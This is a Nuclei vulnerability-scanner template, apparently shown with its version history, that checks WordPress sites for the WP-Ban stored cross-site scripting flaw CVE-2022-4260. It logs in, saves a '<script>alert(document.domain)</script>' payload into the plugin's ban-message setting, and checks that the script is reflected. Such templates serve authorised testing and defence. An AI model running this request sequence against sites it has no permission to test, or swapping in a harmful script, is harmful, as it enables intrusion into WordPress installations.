nuclei-templates/http/cves/2022/CVE-2022-4260.yaml

73 lines
3.0 KiB
YAML
Raw Normal View History

2022-12-26 00:32:40 +00:00
id: CVE-2022-4260
info:
name: WordPress WP-Ban <1.69.1 - Stored Cross-Site Scripting
2022-12-26 00:32:40 +00:00
author: Hardik-Solanki
severity: medium
2022-12-26 00:32:40 +00:00
description: |
WordPress WP-Ban plugin before 1.69.1 contains a stored cross-site scripting vulnerability. The plugin does not sanitize and escape some of its settings, which can allow high-privilege users to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be exploited even when the unfiltered_html capability is disallowed, for example in multisite setup.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or further compromise of the affected system.
2023-09-06 11:59:08 +00:00
remediation: Fixed in version 1.69.1
2022-12-26 00:32:40 +00:00
reference:
- https://wpscan.com/vulnerability/d0cf24be-df87-4e1f-aae7-e9684c88e7db
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4260
- https://drive.google.com/file/d/11nQ21cQ9irajYqNqsQtNrLJOkeRcwCXn/view?usp=drivesdk
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
2022-12-26 00:32:40 +00:00
cve-id: CVE-2022-4260
cwe-id: CWE-79
epss-score: 0.00092
epss-percentile: 0.38897
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:wp-ban_project:wp-ban:*:*:*:*:*:wordpress:*:*
2022-12-26 00:32:40 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 4
2023-07-11 19:49:27 +00:00
vendor: wp-ban_project
product: wp-ban
2023-09-06 11:59:08 +00:00
framework: wordpress
2024-01-14 09:21:50 +00:00
tags: cve,cve2022,wp-plugin,xss,wordpress,wpscan,wp,authenticated,wp-ban,wp-ban_project
2022-12-26 00:32:40 +00:00
http:
2022-12-26 00:32:40 +00:00
- raw:
- |
2022-12-27 16:46:37 +00:00
POST /wp-login.php HTTP/1.1
2022-12-26 00:32:40 +00:00
Host: {{Hostname}}
Origin: {{RootURL}}
2022-12-27 16:46:37 +00:00
Content-Type: application/x-www-form-urlencoded
2022-12-26 00:32:40 +00:00
Cookie: wordpress_test_cookie=WP%20Cookie%20check
2022-12-27 16:46:37 +00:00
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET / HTTP/1.1
2022-12-26 00:32:40 +00:00
Host: {{Hostname}}
2022-12-27 16:46:37 +00:00
- |
POST /wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1
Host: {{Hostname}}
_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=XSS&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&Submit=Save+Changes
- |
GET / HTTP/1.1
Host: {{Hostname}}
Referer: XSS
2023-07-11 19:49:27 +00:00
host-redirects: true
max-redirects: 2
2022-12-26 00:32:40 +00:00
matchers:
2022-12-27 16:46:37 +00:00
- type: dsl
dsl:
- 'contains(body_4, "<script>alert(document.domain);</script>")'
- 'contains(content_type_4, "text/html")'
- 'status_code_4 == 200'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- '_wpnonce=([0-9a-z]+)'
internal: true
2023-07-11 19:49:27 +00:00
part: body
# digest: 4a0a00473045022056ed74a8cc0ce0089a83d4c15b4bf1f89a0ace772be7fabcfc937d2f3084f868022100f457c7292c10b45f14532633d4f8480152018b4865ad89bcb9e5f29fd2fb4bfe:922c64590222798bb761d5b6d8e72950